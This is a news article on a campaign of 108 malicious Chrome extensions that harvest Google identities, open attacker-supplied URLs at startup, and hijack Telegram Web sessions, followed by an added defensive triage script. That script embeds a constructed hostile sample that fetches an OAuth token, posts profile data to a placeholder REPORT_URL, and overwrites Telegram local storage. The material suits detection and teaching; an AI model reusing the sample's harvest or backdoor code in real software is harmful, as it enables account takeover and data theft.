100 Chrome Extensions Steal User Data, Create Backdoor
SecurityWeek · Archived Apr 15, 2026
Published through five accounts, the extensions appear to be part of a coordinated campaign based on shared C&C infrastructure.
Over 20,000 users installed malicious Chrome extensions designed to provide a backdoor, steal information, or inject ads, cybersecurity firm Socket reports.
The nefarious extensions have been published using five different accounts, namely GameGen, InterAlt, SideGames, Rodeo Games, and Yana Project, but appear to be part of a single, coordinated campaign, based on shared command-and-control (C&C) infrastructure.
Socket identified 108 extensions performing various types of malicious activities. Half of them were designed to harvest the identity of the logged-in Google account via OAuth2, and 45 were injected with a universal backdoor that opens arbitrary URLs when the browser starts.
The remaining extensions were designed to exfiltrate Telegram sessions, inject ads into YouTube and TikTok pages, inject content scripts into all visited pages, or to proxy translation requests through an attacker-controlled server.
“The 108 extensions are published across several product categories: Telegram sidebar clients, slot machine and Keno games, YouTube and TikTok enhancers, a text translation tool, and page utility extensions. Each targets a different type of user, but all share the same backend,” Socket says.
The extensions provide the expected functionality to avoid raising suspicion, but malicious code running in the background connects to the threat actor’s C&C to perform the nefarious activities.
Socket draws attention to the Telegram Multi-account extension, which steals the active Telegram Web session and also lets the attackers take over the account by overwriting Telegram's local storage with attacker-supplied data and force-reloading the page.
Another extension, Web Client for Telegram – Teleside, can steal sessions and has a backdoor in the background script that allows the operators to activate a payload directly, without updating the application through the Chrome Web Store.
The 54 extensions that harvest users' Google account identities at login contain identical code to acquire a Google OAuth2 Bearer token, use it to fetch the user's profile information, and send that profile data to a remote server.
“The OAuth token is used locally and never leaves the browser. What reaches the operator’s server is only a permanent identity record: the victim’s email, name, and profile picture,” Socket explains.
The background script of 45 extensions contains an identical function that, upon browser start, opens a URL received from the C&C in a new tab.
“There is no restriction on what URL the server can return. This channel survives browser restarts and operates independently of whether the user ever opens the extension,” Socket notes.
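The behaviours described above (the OAuth2 identity harvest, the startup hook that opens a server-supplied URL, the Telegram Web local-storage overwrite plus forced reload, and content scripts injected into every site) are all visible in an extension's manifest and scripts before it ever runs. The following is an added example, not code from the SecurityWeek article or from Socket's report: a static triage script a responder can run over an unpacked extension (its manifest.json plus the concatenated text of its scripts). The indicator names, the sample manifests and the sample background scripts are constructed for the demo; CONFIG_URL and REPORT_URL in the sample are placeholders, not real infrastructure.

```javascript
// Added example (not the article's or Socket's code): static triage of an
// unpacked Chrome extension against the four behaviours the report describes.
// Indicator names and all sample data below are constructed for this demo.

function hasPermission(manifest, name) {
  return (manifest.permissions || []).includes(name);
}

// True if any match pattern in permissions, host_permissions or content_scripts
// covers the given host (or covers every site).
function coversHost(manifest, host) {
  const patterns = [
    ...(manifest.permissions || []),
    ...(manifest.host_permissions || []),
    ...(manifest.content_scripts || []).flatMap((cs) => cs.matches || []),
  ];
  return patterns.some((p) => p === "<all_urls>" || p.includes(host));
}

const INDICATORS = [
  {
    id: "google-identity-harvest",
    // identity permission + token acquisition + a call to the userinfo endpoint
    test: (m, src) =>
      hasPermission(m, "identity") &&
      /chrome\.identity\.getAuthToken\(/.test(src) &&
      /googleapis\.com\/oauth2\/v\d+\/userinfo/.test(src),
  },
  {
    id: "startup-open-remote-url",
    // onStartup listener plus a tabs.create whose url is not a string literal
    test: (m, src) =>
      /chrome\.runtime\.onStartup\.addListener\(/.test(src) &&
      /chrome\.tabs\.create\(\s*\{[^}]*\burl\s*:\s*(?!["'`])/.test(src),
  },
  {
    id: "telegram-session-overwrite",
    // access to web.telegram.org, a localStorage write, then a forced reload
    test: (m, src) =>
      coversHost(m, "web.telegram.org") &&
      /localStorage\.(setItem|clear)\(/.test(src) &&
      /location\.reload\(/.test(src),
  },
  {
    id: "content-script-all-urls",
    test: (m) =>
      (m.content_scripts || []).some((cs) =>
        (cs.matches || []).some((p) => p === "<all_urls>" || p === "*://*/*")),
  },
];

// Returns the ids of every indicator that fires for this manifest + script text.
function triage(manifest, source) {
  return INDICATORS.filter((i) => i.test(manifest, source)).map((i) => i.id);
}

// ---- constructed samples (not real extensions) ----
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Telegram sidebar (constructed sample)",
  permissions: ["identity", "tabs", "storage", "scripting"],
  host_permissions: ["https://web.telegram.org/*"],
  content_scripts: [{ matches: ["<all_urls>"], js: ["inject.js"] }],
};

// CONFIG_URL and REPORT_URL are placeholders, not real infrastructure.
const SAMPLE_BACKGROUND = `
chrome.runtime.onStartup.addListener(async () => {
  const cfg = await (await fetch(CONFIG_URL)).json();
  chrome.tabs.create({ url: cfg.url });
});
chrome.identity.getAuthToken({ interactive: true }, async (token) => {
  const r = await fetch("https://www.googleapis.com/oauth2/v3/userinfo",
                        { headers: { Authorization: "Bearer " + token } });
  fetch(REPORT_URL, { method: "POST", body: JSON.stringify(await r.json()) });
});
function applySession(tabId, data) {
  chrome.scripting.executeScript({ target: { tabId }, args: [data],
    func: (d) => { for (const k in d) localStorage.setItem(k, d[k]); location.reload(); } });
}
`;

const BENIGN_MANIFEST = {
  manifest_version: 3,
  name: "Word counter (constructed sample)",
  permissions: ["storage"],
  content_scripts: [{ matches: ["https://docs.example.com/*"], js: ["count.js"] }],
};
const BENIGN_BACKGROUND = `
chrome.runtime.onInstalled.addListener(() => {
  chrome.tabs.create({ url: "https://docs.example.com/welcome" });
});
`;

console.log("sample:", triage(SAMPLE_MANIFEST, SAMPLE_BACKGROUND));
console.log("benign:", triage(BENIGN_MANIFEST, BENIGN_BACKGROUND));
```

To use it on a real extension, load the unpacked directory's manifest.json and concatenate its background and content scripts into one string before calling triage. The checks are plain regexes, so minified or obfuscated code will defeat them; treat a hit as a reason to read the script, not as a verdict. The startup-URL indicator is the most discriminating of the four, since there are few legitimate reasons for an onStartup handler to open a tab at a URL that is not a literal in the extension's own code.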
The cybersecurity firm says it reported all the malicious extensions, but they were not immediately removed from the Chrome Web Store.
WRITTEN BY
Ionut Arghire
Ionut Arghire is an international correspondent for SecurityWeek.